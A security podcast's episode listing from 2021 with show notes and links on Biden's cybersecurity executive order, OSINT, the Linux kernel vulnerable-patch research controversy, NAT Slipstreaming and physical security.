S2021 Ep 18 - 2021-018-LawyerLiz, Pres. Biden's EO, and the clueless professor

Elizabeth Wharton: @lawyerliz on Twitter
Executive Order (https://www.americanbar.org/groups/public_education/publications/teaching-legal-docs/what-is-an-executive-order-/): "An executive order is a signed, written, and published directive from the President of the United States that manages operations of the federal government. They are numbered consecutively, so executive orders may be referenced by their assigned number, or their topic. Other presidential documents are sometimes similar to executive orders in their format, formality, and issue, but have different purposes. Proclamations, which are also signed and numbered consecutively, communicate information on holidays, commemorations, federal observances, and trade. Administrative orders—e.g. memos, notices, letters, messages—are not numbered, but are still signed, and are used to manage administrative matters of the federal government. All three types of presidential documents—executive orders, proclamations, and certain administrative orders—are published in the Federal Register, the daily journal of the federal government that is published to inform the public about federal regulations and actions. They are also catalogued by the National Archives as official documents produced by the federal government. Both executive orders and proclamations have the force of law, much like regulations issued by federal agencies, so they are codified under Title 3 of the Code of Federal Regulations, which is the formal collection of all of the rules and regulations issued by the executive branch and other federal agencies. Executive orders are not legislation; they require no approval from Congress, and Congress cannot simply overturn them. Congress may pass legislation that might make it difficult, or even impossible, to carry out the order, such as removing funding. Only a sitting U.S. President may overturn an existing executive order by issuing another executive order to that effect."
https://www.whitehouse.gov/briefing-room/presidential-actions/2021/05/12/executive-order-on-improving-the-nations-cybersecurity/
Another review: https://www.atlanticcouncil.org/blogs/new-atlanticist/markup-our-experts-annotate-bidens-new-executive-order-on-cybersecurity/
https://www.insurancejournal.com/news/national/2021/05/21/615373.htm
Excerpts from the order:
- Within 60 days of the date of this order, the head of each agency shall: (i) update existing agency plans to prioritize resources for the adoption and use of cloud technology as outlined in relevant OMB guidance; (ii) develop a plan to implement Zero Trust Architecture, which shall incorporate, as appropriate, the migration steps that the National Institute of Standards and Technology (NIST) within the Department of Commerce has outlined in standards and guidance, describe any such steps that have already been completed, identify activities that will have the most immediate security impact, and include a schedule to implement them; and
- Within 180 days of the date of this order, agencies shall adopt multi-factor authentication and encryption for data at rest and in transit, to the maximum extent consistent with Federal records laws and other applicable laws.
- Within 90 days of the date of this order, the Secretary of Homeland Security acting through the Director of CISA, in consultation with the Attorney General, the Director of the FBI, and the Administrator of General Services acting through the Director of FedRAMP, shall establish a framework to collaborate on cybersecurity and incident response activities related to FCEB cloud technology, in order to ensure effective information sharing among agencies and between agencies and CSPs.
SBOM! Dr. Allan Friedman on BrakeSec:
https://brakeingsecurity.com/2020-031-allan-friedman-sbom-software-transparency-and-knowing-how-the-sausage-is-made
http://brakeingsecurity.com/2020-032-dr-allan-friedman-sbom-software-transparency-and-how-the-sausage-is-made-part-2
- providing a purchaser a Software Bill of Materials (SBOM) for each product directly or by publishing it on a public website; (viii) participating in a vulnerability disclosure program that includes a reporting and disclosure process; (ix) attesting to conformity with secure software development practices
- Within 270 days of the date of this order, the Secretary of Commerce acting through the Director of NIST, in coordination with the Chair of the Federal Trade Commission (FTC) and representatives of other agencies as the Director of NIST deems appropriate, shall identify IoT cybersecurity criteria for a consumer labeling program, and shall consider whether such a consumer labeling program may be operated in conjunction with or modeled after any similar existing government programs consistent with applicable law. The criteria shall reflect increasingly comprehensive levels of testing and assessment that a product may have undergone, and shall use or be compatible with existing labeling schemes that manufacturers use to inform consumers about the securi

May 22, 2021 - 1h 4m

S2021 Ep 17 - 2021-017-Joe Gray on his future book, the OSINT loop, motivators, and gamification - part 1

Joe Gray @C_3PJoe, The OSINTion https://theosintion.com
New book… ship date? How to get it?
https://www.amazon.com/Practical-Social-Engineering-Joe-Gray/dp/171850098X/
https://nostarch.com/practical-social-engineering
"Gray provides a very accessible look at social engineering that should be essential reading for pentesters and ethical hackers." — Ian Barker, BetaNews
Story (Bryan: found my shipmate from the Navy)
Gathering OSINT (what is ethically too far?)
OSINT heartbeat
https://matrix.berkeley.edu/research-article/berkeley-protocol-open-source-investigations/
https://hunter.io/
https://halalgoogling.com/
The OSINTion Discord: https://discord.gg/p78TTGa

May 18, 2021 - 46 min

S2021 Ep 16 - 2021-016-researchers knowingly add vulnerable code to linux kernel, @pageinsec joins us to discuss - part 2

Updates to the Linux kernel controversy: https://lwn.net/SubscriberLink/854645/334317047842b6c3/
@pageinSec on Twitter
Dan Kaminsky obit: https://www.theregister.com/2021/04/25/dan_kaminsky_obituary/
Spencer Gietzen: http://brakeingsecurity.com/2018-024-pacu-a-tool-for-pentesting-aws-environments
https://en.wikipedia.org/wiki/Milgram_experiment
https://lore.kernel.org/lkml/[email protected]/
https://cse.umn.edu/cs/statement-cse-linux-kernel-research-april-21-2021
https://www.labbott.name/blog/2021/04/21/breakingtrust.html
Seems like a number of patches were added (~190) and each had to be reviewed to make sure it contained nothing malicious.
https://twitter.com/UMNComputerSci/status/1384948683821694976
Response to the researchers on the Linux kernel mailing list: https://lore.kernel.org/linux-nfs/YH%2FfM%[email protected]/
https://danielmiessler.com/blog/explaining-threats-threat-actors-vulnerabilities-and-risk-using-a-real-world-scenario/
https://twitter.com/SarahJamieLewis/status/1384871385537908736
@sarahJamieLewis shows the change they submitted in their paper:
https://twitter.com/SarahJamieLewis/status/1384876050207940608
https://twitter.com/SarahJamieLewis/status/1330671897822982144/photo/1
https://twitter.com/SarahJamieLewis/status/1384880034146574341/photo/1
https://web.archive.org/web/20210421145121/https://www-users.cs.umn.edu/~kjlu/papers/crix.pdf (appears the researcher deleted this paper from their site.)
https://web.archive.org/web/20210422144500/https://www-users.cs.umn.edu/~kjlu/papers/clarifications-hc.pdf (researcher deleted this paper from their site.)
"Throughout the study, we honestly did not think this is human research, so we did not apply for an IRB approval in the beginning. We apologize for the raised concerns. This is an important lesson we learned---Do not trust ourselves on determining human research; always refer to IRB whenever a study might be involving any human subjects in any form. We would like to thank the people who suggested us to talk to IRB after seeing the paper abstract."
https://github.com/QiushiWu/qiushiwu.github.io
NSF grant application (thank you Page!): https://www.nsf.gov/awardsearch/showAward?AWD_ID=1931208&HistoricalAwards=false
NSF IRB requirements (from 2007): https://www.nsf.gov/pubs/2007/nsf07006/nsf07006.jsp
Might be more recent: Human Subjects | NSF - National Science Foundation
The researchers issued an apology today, 25 April: https://lore.kernel.org/lkml/CAK8KejpUVLxmqp026JY7x5GzHU2YJLPU8SzTZUNXU2OXC70ZQQ@mail.gmail.com/
*thanks to Zack Whittaker's security mailing list*
https://twitter.com/argvee
Thought-provoking question for your show: is it realistically possible for an organization to build and scale a culture of code review that catches malicious insertions through (1) expert analysis; (2) adversarial mindset?
Co-author of: https://www.amazon.com/Building-Secure-Reliable-Systems-Implementing/dp/1492083127
Introduction of bugs (meaningful or otherwise) caused more work for devs.
Revert: https://lkml.org/lkml/2021/4/21/454
Quick overview of using deception in research from Duke's IRB: Using Deception in Research | Institutional Review Board (duke.edu)
Is this better? Where's the line on this? https://www.bleepingcomputer.com/news/security/emotet-malware-nukes-itself-today-from-all-infected-computers-worldwide/

May 5, 2021 - 45 min

S2021 Ep 15 - 2021-015-researchers knowingly add vulnerable code to linux kernel, @pageinsec joins us to discuss - part 1

@pageinSec on Twitter
Dan Kaminsky obit: https://www.theregister.com/2021/04/25/dan_kaminsky_obituary/
Spencer Gietzen: http://brakeingsecurity.com/2018-024-pacu-a-tool-for-pentesting-aws-environments
https://en.wikipedia.org/wiki/Milgram_experiment
https://lore.kernel.org/lkml/[email protected]/
https://cse.umn.edu/cs/statement-cse-linux-kernel-research-april-21-2021
https://www.labbott.name/blog/2021/04/21/breakingtrust.html
Seems like a number of patches were added (~190) and each had to be reviewed.
https://twitter.com/UMNComputerSci/status/1384948683821694976
Response to the researchers on the Linux kernel mailing list: https://lore.kernel.org/linux-nfs/YH%2FfM%[email protected]/
https://danielmiessler.com/blog/explaining-threats-threat-actors-vulnerabilities-and-risk-using-a-real-world-scenario/
https://twitter.com/SarahJamieLewis/status/1384871385537908736
@sarahJamieLewis shows the change they submitted in their paper:
https://twitter.com/SarahJamieLewis/status/1384876050207940608
https://twitter.com/SarahJamieLewis/status/1330671897822982144/photo/1
https://twitter.com/SarahJamieLewis/status/1384880034146574341/photo/1
https://web.archive.org/web/20210421145121/https://www-users.cs.umn.edu/~kjlu/papers/crix.pdf (appears the researcher deleted this paper from their site.)
https://web.archive.org/web/20210422144500/https://www-users.cs.umn.edu/~kjlu/papers/clarifications-hc.pdf (researcher deleted this paper from their site.)
"Throughout the study, we honestly did not think this is human research, so we did not apply for an IRB approval in the beginning. We apologize for the raised concerns. This is an important lesson we learned---Do not trust ourselves on determining human research; always refer to IRB whenever a study might be involving any human subjects in any form. We would like to thank the people who suggested us to talk to IRB after seeing the paper abstract."
https://github.com/QiushiWu/qiushiwu.github.io
NSF grant application (thank you Page!): https://www.nsf.gov/awardsearch/showAward?AWD_ID=1931208&HistoricalAwards=false
NSF IRB requirements (from 2007): https://www.nsf.gov/pubs/2007/nsf07006/nsf07006.jsp
Might be more recent: Human Subjects | NSF - National Science Foundation
The researchers issued an apology today, 25 April: https://lore.kernel.org/lkml/CAK8KejpUVLxmqp026JY7x5GzHU2YJLPU8SzTZUNXU2OXC70ZQQ@mail.gmail.com/
*thanks to Zack Whittaker's security mailing list*
https://twitter.com/argvee
Thought-provoking question for your show: is it realistically possible for an organization to build and scale a culture of code review that catches malicious insertions through (1) expert analysis; (2) adversarial mindset?
Co-author of: https://www.amazon.com/Building-Secure-Reliable-Systems-Implementing/dp/1492083127
Introduction of bugs (meaningful or otherwise) caused more work for devs.
Revert list of 190 patches (threaded): https://lkml.org/lkml/2021/4/21/454
Quick overview of using deception in research from Duke's IRB: Using Deception in Research | Institutional Review Board (duke.edu)
Is this better? Where's the line on this? https://www.bleepingcomputer.com/news/security/emotet-malware-nukes-itself-today-from-all-infected-computers-worldwide/

Apr 27, 2021 - 47 min

S2021 Ep 14 - 2021-014-Slipstreaming blocked by Chrome, Slack being used for malware, plus dork and deskjockeys!

Chrome Blocks Port 10080 to Prevent Slipstreaming Hacks - E Hacking News
https://www.reddit.com/r/netsec/comments/jlu3cf/nat_slipstreaming/
Samy Kamkar - NAT Slipstreaming v2.0
Slack and Discord are Being Hijacked by Hackers to Distribute Malware - E Hacking News
Texan's alleged Amazon bombing effort fizzles: Militia man wanted to take out 'about 70 per cent of the internet' - The Register
Pwn2Own 2021: Hackers Offered $200,000 for Zoom, Microsoft Teams Exploits - SecurityWeek.Com
https://twitter.com/k8em0/status/1381258155485585409
https://twitter.com/alisaesage/status/1380797761801445376?s=20
infosecCampout 2021
Hackers Who Paint
WWHF Way West
https://pastebin.com/2eYY6trD (for training students)
@lintile @infosecroleplay

Apr 13, 2021 - 51 min

S2021 Ep 13 - 2021-013-Liana_McCrea-Garrison_Yap-cecil_hotel, Elisa_Lam-physical_security-part 2

Reparations.tech
- Public Safety Coordinators: Field Operations (road incidents); Specialized Buildings (the library, medical facilities, CCR)
- Public Safety Officers
A. Discuss training
- SOP creation: SOPs are very custom and dependent on the organization. There are no "NIST" standards. [IN CYBER: Frameworks for Physical Security ---> ]
- Think on your feet; many plans get thrown out the window.
- Creating policies in response to unforeseen incidents
- Physical security assessments: fire panels, AED, roof accesses
- The checklist: baseline configuration of the operations for a building
- Locksmith troubleshooting
- Lack of funding (historically) + ways to address this in-house
Talking to Strangers: What We Should Know about the People We Don't Know: Gladwell, Malcolm: 9780316478526: Amazon.com: Books
Situational awareness (?)
- "What is Situational Awareness?"
- There's a lack of good training to get people thinking about their own physical security: Ph.D.s leaving car doors wide open, then blaming safety officers when they mess up. Common sense is not so common.
- Scenarios don't always cover every event: dead bodies, car accidents, people streaking (lol), medical issues.
- Policies can be simple, like opening a car door: you need to vet whether the car is actually that person's.
- Have you seen both good and bad training on situational awareness? Does it seem to differ between physical and cyber security?
Summary of the Clery Act | Clery Center: "The Clery Act is a consumer protection law that aims to provide transparency around campus crime policy and statistics. In order to comply with Clery Act requirements, colleges and universities must understand what the law entails, where their responsibilities lie, and what they can do to actively foster campus safety."
C. Real-life examples of physical security blunders
- Death of Elisa Lam - Wikipedia
- Crime Scene: The Vanishing at the Cecil Hotel - Wikipedia
- STORY: a person called the SOC and asked to be let into "their" car (which was not actually their vehicle)
- Performing multiple sweeps of common areas to prevent squatting
- Staff "tripping" alarms
- Deceased faculty + no-sleeping policy
Working as a team
- Escalation management
- Police often increase tensions when de-escalation is needed.
- Locksmith team + public safety team
- Looking for talent in unexpected places to transfer over to cybersecurity (build the bridge)
- Lockpicking community: [insert folks on twitter / youtube]
Companies heading back to work
- What should IT or security think about for businesses that may not have had people in for 6-9 months?
- If companies don't have cameras or physical controls, should they think about improving?
Connect with us!
- Liana McCrea: @GeecheeThreat (Twitter) + LinkedIn
- Garrison Yap: Garrisony75 (Twitter) + LinkedIn
What is physical security? How to keep your facilities and devices safe from on-site attackers | CSO Online
Physical security - Wikipedia
5 Ways IT Managers Can Work with Their Physical Security Counterpart (stanleysecuritysolutions.com)
12 Security Camera System Best Practices – Cyber Safe (een.com)
What is Physical Security? Measures & Planning Guide + PDF (openpath.com)

Apr 7, 2021 - 58 min

S2021 Ep 12 - 2021-012-physical security discussion with @geecheethreat and @garrisony75 - pt 1

Bios for guests: Reparations.tech
- Public Safety Coordinators: Field Operations (road incidents); Specialized Buildings (the library, medical facilities, CCR)
- Public Safety Officers
A. Discuss training
- SOP creation: SOPs are very custom and dependent on the organization. There are no "NIST" standards. [IN CYBER: Frameworks for Physical Security ---> ]
- Think on your feet; many plans get thrown out the window.
- Creating policies in response to unforeseen incidents
- Physical security assessments: fire panels, AED, roof accesses
- The checklist: baseline configuration of the operations for a building
- Locksmith troubleshooting
- Lack of funding (historically) + ways to address this in-house
Talking to Strangers: What We Should Know about the People We Don't Know: Gladwell, Malcolm: 9780316478526: Amazon.com: Books
Situational awareness (?)
- "What is Situational Awareness?"
- There's a lack of good training to get people thinking about their own physical security: Ph.D.s leaving car doors wide open, then blaming safety officers when they mess up. Common sense is not so common.
- Scenarios don't always cover every event: dead bodies, car accidents, people streaking (lol), medical issues.
- Policies can be simple, like opening a car door: you need to vet whether the car is actually that person's.
- Have you seen both good and bad training on situational awareness? Does it seem to differ between physical and cyber security?
Summary of the Clery Act | Clery Center: "The Clery Act is a consumer protection law that aims to provide transparency around campus crime policy and statistics. In order to comply with Clery Act requirements, colleges and universities must understand what the law entails, where their responsibilities lie, and what they can do to actively foster campus safety."
C. Real-life examples of physical security blunders
- Death of Elisa Lam - Wikipedia
- Crime Scene: The Vanishing at the Cecil Hotel - Wikipedia
- STORY: a person called the SOC and asked to be let into "their" car (which was not actually their vehicle)
- Performing multiple sweeps of common areas to prevent squatting
- Staff "tripping" alarms
- Deceased faculty + no-sleeping policy
Working as a team
- Escalation management
- Police often increase tensions when de-escalation is needed.
- Locksmith team + public safety team
- Looking for talent in unexpected places to transfer over to cybersecurity (build the bridge)
- Lockpicking community: [insert folks on twitter / youtube]
Companies heading back to work
- What should IT or security think about for businesses that may not have had people in for 6-9 months?
- If companies don't have cameras or physical controls, should they think about improving?
Connect with us!
- Liana McCrea: @GeecheeThreat (Twitter) + LinkedIn
- Garrison Yap: Garrisony75 (Twitter) + LinkedIn
What is physical security? How to keep your facilities and devices safe from on-site attackers | CSO Online
Physical security - Wikipedia
5 Ways IT Managers Can Work with Their Physical Security Counterpart (stanleysecuritysolutions.com)
12 Security Camera System Best Practices – Cyber Safe (een.com)
What is Physical Security? Measures & Planning Guide + PDF (openpath.com)

Mar 30, 2021 - 33 min